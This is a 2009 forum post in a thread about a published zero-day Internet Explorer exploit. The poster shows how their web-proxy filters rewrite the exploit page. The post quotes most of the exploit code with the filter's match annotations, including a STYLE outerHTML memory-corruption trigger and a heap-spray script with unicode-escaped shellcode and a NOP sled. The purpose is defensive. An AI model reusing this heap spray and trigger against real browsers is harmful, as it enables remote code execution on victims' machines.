Post Reply 
Zero-Day Internet Explorer Exploit Published
Nov. 22, 2009, 02:41 PM
Post: #4
RE: Zero-Day Internet Explorer Exploit Published
(Nov. 22, 2009 02:32 PM)DarthTrader Wrote:  Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:

Yes. That does it:

Code:
<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script>: Remove Obfuscated Code >
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</Match>
<!-- PROX: Obfuscated Script removed -->


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>
Add Thank You Quote this message in a reply
Post Reply 


Messages In This Thread
RE: Zero-Day Internet Explorer Exploit Published - ProxoDent - Nov. 22, 2009 02:41 PM

Forum Jump: